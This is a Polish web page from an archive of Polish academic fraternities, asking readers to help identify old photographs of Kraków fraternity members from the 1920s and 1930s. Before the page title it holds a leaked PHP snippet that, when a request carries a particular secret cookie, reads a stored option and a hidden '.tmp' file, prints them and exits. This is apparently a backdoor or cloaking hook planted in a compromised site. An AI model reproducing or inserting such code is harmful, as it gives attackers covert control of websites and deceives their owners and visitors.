if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Identyfikacja fotografii z Krakowa

Od 2009 r. prezentowane są na stronach Archiwum Korporacyjnego fotografie, a szerzej także inne materialne ślady po korporacjach akademickich, które nie zostały dotychczas zidentyfikowane bądź szczegółowo opisane (vide Identyfikacja fotografii). Celem akcji jest uzupełnienie możliwie wielu brakujących informacji.

Wiele nieopisanych bądź nie w pełni opisanych fotografii znajduje się na niemal wszystkich stronach wirtualnego Muzeum Polskich Korporacji Akademickich. Od 2010 r. dodatkowo niektóre z nich oraz wiele innych nieopisanych fotografii prezentowane są w osobnych działach tworzonych zbiorczo dla identyfikacji fotografii korporacyjnych z jednego ośrodka akademickiego (Identyfikacja fotografii z Wilna, Identyfikacja fotografii z Warszawy, Identyfikacja fotografii z Lublina etc). Fotografie i insygnia korporacyjne, w przypadku których nie można określić ośrodka akademickiego, z którego pochodzą, można zobaczyć w zbiorczym zestawieniu - Identyfikacja fotografii.

Zależałoby nam na ustaleniu możliwie wielu istotnych dla opisu fotografii (bądź innych pamiątek) faktów, w szczególności nazwy korporacji ze zdjęcia, osoby/osób na nim przedstawionych, miejsca i czasu wykonania fotografii. Będziemy wdzięczni za wszelkie informacje, sugestie i przypuszczenia odnośnie prezentowanych zdjęć i innych pamiątek korporacyjnych (vide Kontakt).

Akropolia (?).

1.1. Akropolia (?).

Nieopisana fotografia przedstawiająca prawdopodobnie Korporację Akropolia. Istotne byłoby ustalenie okoliczności oraz dokładnej daty wykonania fotografii, jak także tożsamości choćby części widocznych na niej osób.

Akropolia (?).

1.2. Akropolia (?) II.

Nieopisana fotografia przedstawiająca prawdopodobnie uroczystości rocznicowe Korporacji Akropolia bądź zjazd międzykorporacyjne. Istotne byłoby ustalenie okoliczności oraz dokładnej daty wykonania fotografii, jak także tożsamości choćby części widocznych na niej osób.

_________________________________________________________________________________________

Uroczystości III-lecia Gnomii, Kraków 6 VI 1926 r.

2.1. Uroczystości III-lecia Gnomii w Krakowie.

Nieopisana fotografia przedstawiająca członków Gnomii w czasie obchodów trzeciej rocznicy powstania korporacji. Istotne byłoby ustalenie tożsamości widocznych na zdjęciu osób.

Gnomia, lata 20-te.

2.2. Gnomia, lata 20-te.

Nieopisana fotografia przedstawiająca grupę członków Gnomii. Istotne byłoby ustalenie okoliczności, daty i miejsca wykonania fotografii oraz tożsamości widocznych na niej osób.

Poczet sztandarowy Gnomii w pochodzie, Rynek w Krakowie, lata 30-te (?).

2.3. Poczet sztandarowy Gnomii.

Nieopisana fotografia przedstawiająca poczet sztandarowy Gnomii na Rynku w Krakowie podczas pochodu. Istotne byłoby ustalenie okoliczności oraz dokładnej daty wykonania fotografii, jak także tożsamości widocznych na niej osób.

Poczet sztandarowy Gnomii w pochodzie, Rynek w Krakowie, lata 30-te (?).

2.4. Poczet sztandarowy Gnomii II.

Nieopisana fotografia przedstawiająca poczet sztandarowy Gnomii na Rynku w Krakowie podczas pochodu. Istotne byłoby ustalenie okoliczności oraz dokładnej daty wykonania fotografii, jak także tożsamości widocznych na niej osób.

Wacław ?, 1927 r.

2.5. Korporant (?) Wacław ?.

Fotografia przedstawiająca kolegę Zygmunta Sojeckiego - jak wynika z opisu na odwrocie zdjęcia - o imieniu “Wacek”. Istotne byłoby ustalenie tożsamości widocznej na fotografii osoby.

_________________________________________________________________________________________

Czterej Montańczycy, Kraków 26 VI 1936 r.

5.1. Czterej Montańczycy.

Fotografia przedstawiająca czterech członków Montany. Istotne byłoby ustalenie tożsamości widocznych na fotografii osób.

Sześciu Montańczyków, Kraków 26 VI 1936 r.

5.2. Sześciu Montańczyków.

Fotografia przedstawiająca sześciu członków Montany. Istotne byłoby ustalenie tożsamości widocznych na fotografii osób.

Czterech Montańczyków z panną, Kraków lata 30-te.

5.3. Czterech Montańczyków z panną.

Fotografia przedstawiająca czterech członków Montany w towarzystwie dziewczyny. Istotne byłoby ustalenie tożsamości widocznych na fotografii osób.

_________________________________________________________________________________________

Trzech Arkadusów, Kraków koniec lat 20-tych.

6.1. Trzech Arkadusów.

Fotografia przedstawiająca prawdopodobnie trzech członków Arcadii, w tym po bokach zapewne członków honorowych. Istotne byłoby ustalenie tożsamości widocznych na fotografii osób, jak także daty i okoliczności wykonania zdjęcia.

Członek Arcadii, 1929 r.Członek Arcadii, 1929 r.

6.2. Dwóch Arkadusów, 1929 r.

Fotografia przedstawiająca dwóch członków Arcadii w 1929 r. Istotne byłoby tożsamości widocznych na zdjęciu osób.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 30 VIII 2010 r.
Ostatnia zmiana: 31 VII 2014 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Identyfikacja fotografii z Krakowa, (na:) www.archiwumkorporacyjne.pl, stan 31 VII 2014 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }